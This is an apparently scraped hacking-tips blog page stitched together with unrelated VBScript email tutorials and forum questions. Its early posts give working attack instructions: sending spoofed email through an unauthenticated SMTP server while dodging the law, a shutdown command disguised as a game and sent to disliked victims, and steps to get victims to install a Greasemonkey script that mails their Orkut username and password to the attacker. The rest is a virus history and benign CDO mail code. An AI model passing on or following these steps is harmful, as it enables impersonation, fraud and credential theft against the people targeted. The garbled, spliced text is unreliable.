The Anti-Virus should stop you (if it does that means its working). Don't worry about it. The main bug in this system is that the SMTP server access dosent need any authentication, means when u want to send data to any of the email account you need not to provide the your identification or the email id and password you can just login with any email id and send email. But the receiver has to give his e mail id and password as the pop3 server needs a authentication. thus using this bug even a leyman can send a fake mail with any user id and fool the receiver. This kind of java script are alraedy available on net so u can get it from any where, Now the main crux here is that the mail can be trace and the ip can br known to the tracer, now a days terorist are using such bugs to send email and may be traced. So please dont use this method for any destructive or negative purpose. As per the indian laws it may be punishable to send fake mail via internet bus there is no such juridiction in law for sending fake mail through GPRS and this the loop hole.So once you got the site from web for fake mail use it to send fake mail via GPRS and enjoy. Since your mobile phone is your personal device and there is every possibility you having your personal stuff in the phone which you not like to share and there is nothing better than having an application by means of which you can prevent anyone from seeing your private files etc. File hide features: 1. Download file hide on your phone and when you run it for the first time it prompts you to set a password. Then just set the password and restart file hide to start using it. 2. To change the set password what you need to do is enter the current password and then enter the new password. 3. When you launch file hide it asks for the password you set earlier each time, so that no one other than you can use the software. 4. To protect your files you can click on the hide feature in the option menu and the file will then not be listed in the phone and can be seen only through file hide. 5. The better way to hide a file is to uncheck the option which shows the status of the file which means that it will show the file in the phone but you no one can’t open the file without password. If you uncheck the option it will completely hide the file rather than showing a password protected file Another good thing about File hide is that it is available for free and it is quite fast and easy to use. you cannot see the hidden files in the phone but when you access the memory card from your computer, the hidden files become visible Download here: http://www.getjar.com/products/15083/FileHide Posted by jainam shah at 6:17 PM 0 comments Links to this post Friday, September 26, 2008 Airtel Hack Free GPRS All you needan AIRTEL LIVE activated SIM card. Posted by jainam shah at 10:47 PM 0 comments Links to this post Web Proxy For privacy A free anonymous web proxy site allows any web browser to access other third-party websites by channeling the browser’s connection through the proxy. The web proxy basically acts as a middleman between your web browser and the third-party website you are visiting. Why would you want to do this? There are two common reasons: You’re connecting to a public network at a coffee shop or internet café and you want privacy while you browse the web. You don’t want the admin to know every site you visit. You want to bypass a web content filter or perhaps a server-side ban on your IP address. Content filtering is common practice on college campus networks. This trick will usually bypass those restrictions. There are subscription services and applications available such as TOR and paid VPN servers that do the same thing. However, this trick is free and easy to access from anywhere via Google. All you have to do is look through the search results returned by the queries below, find a proxy that works, and enter in the URL of the site you want to browse anonymously. Examples: inurl:”nph-proxy.cgi” “start using cgiproxy” inurl:”nph-proxy.cgi” “Start browsing through this CGI-based proxy” More info. Well it's not really a virus of a hack because it doesn't damage anything. But that aside what it will do is shutdown the victim’s computer, this can be put in MSN convos so it is VERY fun to have, and it can also be put in emails and such like things. 1) Right click on desk top, and then go New, then Shortcut. 2) Then in the "type location of the item" you want to type: %windir%\system32\shutdown.exe -s -t 120 -c "This is a virus" You can change "this is a virus" to anything you would like that’s just the message that will appear. The 120 you typed in can also be change at will, this is simply the amount of time they receive in till there computer will shutdown. Once the code has been entered as you have seen above click next. My advice would be to rename it something like.... wicked game. Depends on the victim’s age and sex. But make sure you call it something good or the victim won't bother clicking on it. After you have given it a name click on finish. You should now have an icon on your desktop that is called "wicked game" or whatever name you gave it. It is also advised you change the icon to something different. 3) Change name and icon. 4) Now to send it to some one you need to make a compressed file. This can be done by right clicking on the desktop, New, Compressed file (zipped) Then another folder should appear on your desktop click on this and drag your shutdown virus into the zipped folder. 5) Once your shutdown virus is in your compressed folder rename it. Make sure to give it a similar name as to the file inside it like "Great Game.zip" Don’t forget to add the .zip at the end. .... WARNING! Make sure when you rename the compressed folder to add .zip at the end it is very important. Now feel free to send it to anyone you...... dislike greatly. As a safe guard I will tell you how to stop the shutdown count down. Just encase you ever click it your self LOL Ok go to start, run, type cmd, then in cmd type: shutdown -a changing icon http://www.windweaver.com/w95man4c.ht atest Method to Hack Orkut - Using Greasemonkey First of all, let me make clear that I don't want to steal credits for this method. This method is found by XxSidxX. Now, let's move on. 1) First of all, your victim MUST HAVE FIREFOX WITH GREASEMONKEY. Download firefox at:- http://www.firefox.com Download greasemonkey at:- https://addons.mozilla.org/en-US/firefox/addon/748 2) Now, go to http://www.trickplanet.com/orkut/hack.php Download the file "multiple.user.js" Now open it with NOTEPAD. Search for the code action=""; and replace it with action="your_email_address@yourdomain.com"; Save the file with the name multiple.user.js and upload it on googlepages or 110mb or any other free subdomain or your own domain. e.g. http://[YOUR DOMAIN NAME]/multiple.user.js 3) Now make your victim install this file. He will be able to install it IF AND ONLY IF he has FIREFOX WITH GREASEMONKEY. Once your victim installs this file, you are done ! 4) Now the next time he opens orkut and logs in to orkut, his username and password will be emailed to you at the email ID you provided in step 2. Enjoy ! ;) Do not misuse ! :) Happy Hacking ! here are the list of top ten most dangeous computer virus that the world has ever faced CIH (1998) Estimated Damage: 20 to 80 million dollars worldwide, countless amounts of PC data destroyed Unleashed from Taiwan in June of 1998, CIH is recognized as one of the most dangerous and destructive viruses ever. The virus infected Windows 95, 98, and ME executable files and was able to remain resident in a PC's memory, where it continued to infect other executables. What made CIH so dangerous is that, shortly after activated, it would overwrite data on the host PC's hard drive, rendering it inoperable. It was also capable of overwriting the BIOS of the host, preventing boot-up. Because it infected executable files, CIH wound up being distributed by numerous software distributors, including a demo version of an Activision game named Sin. CIH is also known as the Chernobyl virus because the trigger date of certain strains of the virus coincides with the date of the Chernobyl nuclear reactor accident. The virus is not a serious threat today, thanks to increased awareness and the widespread migration to Windows 2000, XP, and NT, none of which are vulnerable to CIH. Melissa (1999) Estimated Damage: 300 to 600 million dollars On Friday, March 26, 1999, W97M/Melissa became front-page news across the globe. Estimates have indicated that this Word macro script infected 15 to 20 percent of all business PCs. The virus spread so rapidly that Intel, Microsoft, and a number of other companies that used Outlook were forced to shut down their entire e-mail systems in order to contain the damage. The virus used Microsoft Outlook to e-mail itself to 50 names on a user's contact list. The e-mail message contained the sentence, "Here is that document you asked for don't show anyone else." with an attached Word document. Clicking open the .DOC file and thousands of unsuspecting users did so which allowed the virus to infect the host and repeat the replication. Adding insult to injury, when activated, this virus modified users' Word documents with quotes from the animated TV show "The Simpsons." ILOVEYOU (2000) Estimated Damage: 10 to 15 billion dollars Also known as Loveletter and The Love Bug, this was a Visual Basic script with an ingenious and irresistible hook: the promise of love. On May 3, 2000, the ILOVEYOU worm was first detected in Hong Kong. The bug was transmitted via email with the subject line "ILOVEYOU" and an attachment, Love-Letter-For-You.TXT.vbs. Similar to Melissa, the virus mailed itself to all Microsoft Outlook contacts. The virus also took the liberty of overwriting music files, image files, and others with a copy of itself. More disturbingly, it searched out user IDs and passwords on infected machines and e-mailed them to its author. Code Red (2001) Estimated Damage: 2.6 billion dollars Code Red was a computer worm that was unleashed on network servers on July 13, 2001. It was a particularly virulent bug because of its target: computers running Microsoft's Internet Information Server (IIS) Web server. The worm was able to exploit a specific vulnerability in the IIS operating system. Ironically, Microsoft had released a patch addressing this hole in mid-June. Also known as Bady, Code Red was designed for maximum damage. Upon infection, the Web site controlled by the affected server would display the message, "HELLO! Welcome to http://www.worm.com! Hacked By Chinese!" Then the virus would actively seek other vulnerable servers and infect them. This would go on for approximately 20 days, and then it would launch denial of service attacks on certain IP addresses, including the White House Web server. In less than a week, this virus infected almost 400,000 servers, and it's estimated that one million total computers were infected .Estimated Damage: Because SQL Slammer erupted on a Saturday, the damage was low in dollars and cents. However, it hit 500,000 servers worldwide, and actually down South Korea's online capacity for 12 hours. SQL Slammer Estimated cost:over $ 1billion Also known as Sapphire, was launched on January 25, 2003. It was a doozy of a worm that had a noticeable negative impact upon global Internet traffic. Interestingly enough, it didn't seek out end users' PCs. Instead, the target was servers. The virus was a single-packet, 376-byte worm that generated random IP addresses and sent itself to those IP addresses. If the IP address was a computer running an unpatched copy of Microsoft's SQL Server Desktop Engine, that computer would immediately begin firing the virus off to random IP addresses as well. With this remarkably effective way of spreading, Slammer infected 75,000 computers in 10 minutes. The outrageously high amounts of traffic overloaded routers across the globe, which created higher demands on other routers and so on. Blaster (2003) Estimated Damage: 2 to 10 billion dollars, hundreds of thousands of infected PCs The summer of 2003 was a rough time for businesses running PCs. In rapid succession, IT professionals witnessed the unleashing of both the Blaster and Sobig worms. Blaster, also known as Lovsan or MSBlast, was the first to hit. The virus was detected on August 11 and spread rapidly, peaking in just two days. Transmitted via network and Internet traffic, this worm exploited a vulnerability in Windows 2000 and Windows XP, and when activated, presented the PC user with a menacing dialog box indicating that a system shutdown was imminent. Hidden in the code of MSBLAST.EXE -- the virus' executable " were these messages: "I just want to say LOVE YOU SAN!!" and "billy gates why do you make this possible? Stop making money and fix your software!! Bagle (2004) Estimated Damage: Tens of millions of dollars...and counting Bagle, a classic but sophisticated worm, made its debut on January 18, 2004. The malicious code infected users' systems via the traditional mechanism -- an e-mail attachment -- and then scoured Windows files for e-mail addresses it could use to replicate itself. The real danger of Bagle (a.k.a. Beagle) and its 60 to 100 variants is that, when the worm infects a PC, it opens a back door to a TCP port that can be used by remote users and applications to access data -- financial, personal, anything -- on the infected system. According to an April 2005 TechWeb story, the worm is "usually credited with starting the malwarefor-profit movement among hackers, who prior to the ground-breaking worm, typically were motivated by notoriety." The Bagle.B variant was designed to stop spreading after January 28, 2004, but numerous other variants of the virus continue to plague users to this day. Sobig.F (2003) Estimated Damage: 5 to 10 billion dollars, over 1 million PCs infected The Sobig worm hit right on the heels of Blaster, making August 2003 a miserable month for corporate and home PC users. The most destructive variant was Sobig.F, which spread so rapidly on August 19 that it set a record (which would later be broken by MyDoom), generating over 1 million copies of itself in its first 24 hours. The virus infected host computers via innocuously named e-mail attachments such as application.pif and thank_you.pif. When activated, this worm transmitted itself to e-mail addresses discovered on a host of local file types. The end result was massive amounts of Internet traffic. On September 10, 2003, the virus deactivated itself and is no longer a threat. Microsoft has announced a $250,000 bounty for anyone who identifies Sobig.F's author, but to date, the perpetrator has not been caught. MyDoom (2004) Estimated Damage: At its peak, slowed global Internet performance by 10 percent and Web load times by up to 50 percent For a period of a few hours on January 26, 2004, the MyDoom shockwave could be felt around the world as this worm spread at an unprecedented rate across the Internet via e-mail. The worm, also known as Norvarg, spread itself in a particularly devious manner: It transmitted itself as an attachment in what appeared to be an e-mail error message containing the text "Mail Transaction Failed." Clicking on the attachment spammed the worm to e-mail addresses found in address books. MyDoom also attempted to spread via the shared folders of users' Kazaa peer-to-peer networking accounts. The replication was so successful that computer security experts have speculated that one in every 10 e-mail messages sent during the first hours of infection contained the virus. MyDoom was programmed to stop spreading after February 12, 2004. Sasser (2004) Estimated Damage: Tens of millions of dollars Sasser began spreading on April 30, 2004, and was destructive enough to shut down the satellite communications for some French news agencies. It also resulted in the cancellation of several Delta airline flights and shut down of numerous companies' systems worldwide. Unlike most previous worms, Sasser was not transmitted via e-mail and required no user interaction to spread. Instead the worm exploited a security flaw in nonupdated Windows 2000 and Windows XP systems. When successfully replicated, the worm would actively scan for other unprotected systems and transmit itself to them. Infected systems experienced repeated crashes and instability. Sasser was written by a 17-year-old German high school student, who released the virus on his 18th birthday. Because he wrote the code when he was a minor, a German court found him guilty of computer sabotage but gave him a suspended sentence. did so which allowed the virus to infect the host and repeat the PaulSadowski.co Windows Scripting Host VBScript To Send Email Using CDO Saturday, May Windows 2000 and Windows XP use CDO messaging as a replacement for CDONTS. Sending email with CDO is a simple task. First we create a reference to the CDO component Set objMessage = CreateObject("CDO.Message") then fill-in Sender, Subject and Recipient (To) fields of the headers and the body text which can be either plain text o HTML. You can also add a file attachment. You then use the Send method to send the email. Below I'll show all three types of emails, and how to send an email using a remote SMTP server in the event you are running your own. I've added and example to illustrate how to request a return receipt and delivery status notification Please note, when using the AddAttachment method in your scripts you must use a fully qualified pathname as the argument to the method. Using just a file name or a relative path will produce the error The specified protocol is unknown. If you receive an error message related to objMessage. From then you should try replacing it with objMessage.Sende I've added sample code to illustrate how to load the body of the email from a text file on your disk. I've added a sample of how to load recipient data from a database. I've added a sample illustrating how to use data from Excel in an email. By repeating the .AddAttachment method you can attach more than one file. When attaching files keep in mind that your recipient may be limited in their ability to receive files above a certain size. Many ISPs limit emails to 8 or 10MB each. You should not send large files to anyone before obtaining their permission. Set objMessage = CreateObject("CDO.Message") objMessage.Subject = "Example CDO Message" objMessage. From = "me@my.com" objMessage. To = "test@paulsadowski.com" objMessage.TextBody = "This is some sample message text." objMessage.AddAttachment "c:\temp\readme.txt" objMessage.Send Sending a text email using a remote server. Sometimes you need to send email using another server. It may be required by your company, or your ISP may be blocking the SMTP port, or your dynamic IP may be blacklisted for being in a dynamic pool. This code shows you how to use a remotes server rather than the SMTP server on your own machine. The sample code below shows you how to do this. The text can be either plain text or HTML as needed. Our example assumes your text is in the file C:\Temp\MyEmail.txt. This code loads the entire content of that file into a variable, here named BodyText which you can then reference in your CDO code. We assume BodyText is in the scope of your CDO code. 'These constants are defined to make the code more readable Const ForReading = 1, ForWriting = 2, ForAppending = 8 Dim fso, f Set fso = CreateObject("Scripting.FileSystemObject") 'Open the file for reading Set f = fso.OpenTextFile("c:\temp\MyEmail.txt", ForReading) 'The ReadAll method reads the entire file into the variable BodyText BodyText = f.ReadAll 'Close the file f.Close Set f = Nothing Set fso = Nothing Once the text is loaded you can use it in your CDO code something like this... objMessage.TextBody = BodyText or objMessage.HTMLBody = BodyText Load Recipients from a Database As is the case with most thing in Windows there are many ways to accomplish a task. This is one method of many Our database is an Access format database that resides on the local disk. The table in our database that we are interested in is called Customers and each record consists of 4 fields named "ID", "Name", "Email", and "Custome where ID is an autogenerated index, Name is the full name of our customer, Email is the customer's email addres and Customer is their customer identification number. We are only interested here in two fields, Name and Email. ID 1 2 Name Bob Jones Jane Smith Email bjones@test.com jsmith@test.net 12345 12346 Customer Set OBJdbConnection = CreateObject("ADODB.Connection") OBJdbConnection.Open "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=c:\Acme Inc\Databases\Customers.m SQLQuery = "SELECT Name, Email FROM Customers" Set Result = OBJdbConnection.Execute(SQLQuery) if Not Result.EOF then Do While Not Result.EOF SendMail Result("Name"), Result("Email") Result.MoveNext Loop end if OBJdbConnection.Close As you can see the code is simple. We create a database connection object then open the database and query it the Name and Email fields of each customer. Those values are passed for each customer to a subroutine that sen the customer an email. Sub SendMail(TheName, TheAddress) Dim objMessage, Rcpt Rcpt = Chr(34) & TheName & Chr(34) & "<" & TheAddress & ">" Set objMessage = CreateObject("CDO.Message") objMessage.Subject = "This Month's Sales" objMessage. From = """Acme Sales"" " objMessage. To = Rcpt objMessage.HTMLBody = TextBody objMessage.Send End Sub If you are not accustomed to working with databases then this may have seemed a daunting task but as you can from the code above, it's really quite simple. We've already covered sending email so I'll just mention that this subroutine assumes the HTML body text is a variable called TextBody (see Loading email body text from a file) Also we format the recipient's address in the standard format of "Name" for a more profess look to the recipient.. Remarks As previously stated there are many ways to do this. I've presented one simple method here. Your own use may b with an ODBC connection; it may use mySQL or SQL Server; it may include personalization of the email body tex more. My intent here was to provide you with the basics to get you started. Load data from an Excel Worksheet There may be times when you want to generate an email using data from an application such as Excel. This is on simple illustration of how that could be done. In our example we will be using a Workbook with three columns starting at column A row 1. Each row represents product in our inventory and the three columns contains the following data about each item: Part Number, Name Part, Number of Items in Inventory. Graphically our Workbook looks like this: Part 4583586 5898547 Fliggalhopper Looplonger Name 452 293 Stock This particular script works by walking down each cell of column 1 till it finds an empty cell which it assumes is the of the list of entries. If your file may contain empty cells then you can use the Worksheet's UsedRange.Rows.Cou property to find the last row in which an entry is made. Your code would then use a for loop something like this: rowLast = objSheet.UsedRange.Rows.Count for x = rowStart to rowLast ' do stuff next Function GetData() Dim x, strTemp, objExcel, objWB Set objExcel = Wscript.CreateObject("Excel.Application") Set objWB = objExcel.Workbooks.Open("c:\Acme Inc\Workbooks\Test.xls") Set objSheet = objExcel.ActiveWorkbook.Worksheets(1) ' Make Excel visible while debugging objExcel.Visible = True ' This is the row of our first cell. x=1 do while objExcel.Cells(x, 1).Value <> "" strTemp = strTemp & objExcel.Cells(x, 1).Value & _ Space(10 - Len(objExcel.Cells(x, 1).Value)) strTemp = strTemp & objExcel.Cells(x, 2).Value & _ Space(50 - Len(objExcel.Cells(x, 2).Value)) strTemp = strTemp & objExcel.Cells(x, 3).Value & vbCRLF x=x+1 loop ' This will prevent Excel from prompting us to save the workbook. objExcel.ActiveWorkbook.Saved = True ' Close the workbook and exit the application. objWB.Close objExcel.Quit set objWB = Nothing set objExcel = Nothing GetData = strTemp End Function ' This is our main function. Dim strBody Set objMessage = CreateObject("CDO.Message") objMessage.Subject = "Inventory report for " & Date objMessage. From = "me@my.com" objMessage. To = "bossman@my.com" strBody = "Part" & Space(6) & "Item" & Space(46) & "Stock" & vbCRLF ' Here we call the function GetData to populate the body text. strBody = strBody & GetData objMessage.TextBody = strBody objMessage.Send The code above will produce an email that looks something like this: To: bossman@my.com From: me@my.com Subject: Inventory report for 3/19/2005 Part 4583586 5898547 Item Fliggalhopper Looplonger Stock 452 293 © 2003-2005 by Paul R All Rights Reserved. Used By Comments A. If you have Microsoft IIS with SMTP installed on a server, you can use the following code to send a basic email message from within a script: Set objMessage = CreateObject("CDO.Message") objMessage.Subject = "Subject" objMessage.Sender = "administrator@savilltech.com" objMessage. To = "batman@savilltech.com" objMessage.TextBody = "Your identity is compromised." objMessage.Send (Substitute your own email information and message text.) I try the following sample code from Microsoft website and it does not work. I may miss some configuration here. Please take a look and let me know how to make it work. Here is my goal: I need to be able to send email from a workstation that has Internet connction. This action is either time-interval driven or event driven. I tried the following without success yet. 1. Send email from a script with SMTP service installed: http://www.microsoft.com/technet/scriptcenter/scripts/default.mspx?mfr=true Set objEmail = CreateObject("CDO.Message") objEmail. From = "monitor@mycorp.com" objEmail. To = "admin@mycorp.com" objEmail.Subject = "Atl-dc-01 down" objEmail.Textbody = "Atl-dc-01 is no longer accessible over the network." objEmail.Send I save the above code as send-mail1.vbs and run it from a XP machine with SMTP service started. It did not run into any error but I did not receive this email either. Q#1.1 Without specifying a real SMTP server, how does the script know how to send it out? Q#1.2 How to 'trace' the test email so I know where the problem is? 2. Send email without SMTP service installed: http://www.microsoft.com/technet/scriptcenter/scripts/default.mspx?mfr=true Set objEmail = CreateObject("CDO.Message") objEmail. From = "monitor@mycorp.com" objEmail. To = "admin@mycorp.com" objEmail.Subject = "Server down" objEmail.Textbody = "Server1 is no longer accessible over the network." objEmail.Configuration.Fields.Item _ ("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 objEmail.Configuration.Fields.Item _ ("http://schemas.microsoft.com/cdo/configuration/smtpserver") = _ "smarthost" objEmail.Configuration.Fields.Item _ ("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25 objEmail.Configuration.Fields.Update objEmail.Send I save the above code as email-no-smtp.vbs and run it from the same XP workstation. It run into error on line#15: The transport failed to connect to the server. Q#2.2: What kind of (remote) server do I need if I do not have SMTP service installed on the local machine? Q#2.3: Any such servers available (for free)? I guess there should be very few. Otherwise the spammers could take advantage of them. Q#3. Do you have any other solution to achieve my goal? Thanks a lot. Save the fol extension of .VBS. You can edit it with notepad and read the comments which all begin with an apastrophe. You will need to change just a few lines. You need to put in your domain name, who you wa address of your SMTP server and you will need to edit the message body and attachment info follow. For your SMTP server, take a look in the properties of your Outlook Email account. If you use server name instead of entering an IP address. If you are using an Exchange server, you cou need to speak to your network admin to allow you to relay to the server. There are several ways to send an email from VBS (ASP, WSH, IE-HTA, ...) or from VBA (Word, Excel). This page contains sample code to send simple email message for CDO, CDONTS and Outlook objects. Please see Pure/Huge asp file upload to send emails with attachment from a client side. Live sample of upload a file and send it by email is on Huge-ASP file upload to email sample page. 1. IIS SMTP service, CDONTS.NewMail If you have IIS SMTP service installed on your machine, you can send an email using the service and CDONTS.NewMail object. This object lets you send text or HTML emails (with attachment/images) by a simple way, but its performance is not so good. You can send only several few emails per second. Next sub shows basic CDONTS.NewMail idea. Sub SendMailCDONTS(aTo, Subject, TextBody, aFrom) Const CdoBodyFormatText = 1 Const CdoBodyFormatHTML = 0 Const CdoMailFormatMime = 0 Const CdoMailFormatText = 1 Dim Message 'As New cdonts.NewMail 'Create CDO message object Set Message = CreateObject("cdonts.NewMail") With Message 'Set email adress, subject And body .To = aTo .Subject = Subject .Body = TextBody 'set mail And body format .MailFormat = CdoMailFormatText .BodyFormat = CdoBodyFormatText 'Set sender address If specified. If Len(aFrom) > 0 Then .From = aFrom 'Send the message .Send End With End Sub 2. IIS SMTP service, CDO.Message CDO for W2k lets you send an email using any SMTP server - you can send the email with IIS SMTP service also. Sub SendMailCDO(aTo, Subject, TextBody, aFrom) Const cdoOutlookExvbsss = 2 Const cdoIIS = 1 Dim Message As New CDO.Message 'Create CDO message object Set Message = CreateObject("CDO.Message") With Message 'Load IIS configuration .Configuration.Load cdoIIS 'Set email adress, subject And body .To = aTo .Subject = Subject .TextBody = TextBody 'Set sender address If specified. If Len(aFrom) > 0 Then .From = aFrom 'Send the message .Send End With End Sub You can cache configuration and use it multiple times to get a better performance of the object. CDO.Message can send 5 times more messages in the same time than CDONTS. Sub SendMailCDOCacheConf(aTo, Subject, TextBody, aFrom) 'cached configuration Static Conf ' As New CDO.Configuration If IsEmpty(Conf) Then Const cdoOutlookExvbsss = 2 Const cdoIIS = 1 Set Conf = CreateObject("CDO.Configuration") Conf.Load cdoIIS End If Dim Message 'As New CDO.Message 'Create CDO message object Set Message = CreateObject("CDO.Message") With Message 'Set cached configuration Set .Configuration = Conf 'Set email adress, subject And body .To = aTo .Subject = Subject .TextBody = TextBody 'Set sender address If specified. If Len(aFrom) > 0 Then .From = aFrom 'Send the message .Send End With End Sub 3. Remote SMTP server, CDO.Message If you want to send an email using another SMTP server, you can set configuration properties to the server. See more in Email from ASP - Using external smtp server and CDO article. ... 'cached configuration Static Conf 'As New CDO.Configuration If IsEmpty(Conf) Then Const cdoSendUsingPort = 2 Set Conf = CreateObject("CDO.Configuration") With Conf.Fields .Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = _ cdoSendUsingPort .Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = _ "any smtp server" .Update End With End If ... 4. Send message using Outlook You can send emails using Outlook also. You can send email over Microsoft Exchange with this object (or another email server, using IMAP/POP). Sub SendMailOutlook(aTo, Subject, TextBody, aFrom) 'Create an Outlook object Dim Outlook 'As New Outlook.Application Set Outlook = CreateObject("Outlook.Application") 'Create e new message Dim Message 'As Outlook.MailItem Set Message = Outlook.CreateItem(olMailItem) With Message 'You can display the message To debug And see state '.Display .Subject = Subject .Body = TextBody 'Set destination email address .Recipients.Add (aTo) 'Set sender address If specified. Const olOriginator = 0 If Len(aFrom) > 0 Then .Recipients.Add(aFrom).Type = olOriginator 'Send the message .Send End With End Sub 5. Send message with client-side attachment - Upload to email This live sample is located on http://www.motobit.com/util/upload/upload.asp URL. The sample uses Pure-ASP file upload (free ASP include) or Huge-ASP file upload (hi-performance upload component). Each of email objects have a method to attach one or more files located on disk, the base idea is bellow. 'Create a new email message Set objNewMail = CreateObject("CDONTS.NewMail") Const CdoMailFormatMime = 0 objNewMail.MailFormat = CdoMailFormatMime 'Attach some file. objNewMail.AttachFile FileName 'Send the new email objNewMail.Send eFrom, eTo, Subject, Message Next is a full source code of upload-to-email sample. The sample processes source HTML form with From, To, Subject and Message fields and one or more file fields, then uses AttachFile method of CDONTS.NewMail object to put uploaded files into email. <% 'Sample file Form-Email.asp ' Let's you send one an email with one Or more attachments from client-side disk. 'Variable with output/result data of the form processing Dim ResultHTML 'Create upload form 'Using Huge-ASP file upload 'Dim Form: Set Form = Server.CreateObject("ScriptUtils.ASPForm") 'Using Pure-ASP file upload Dim Form: Set Form = New ASPForm %>
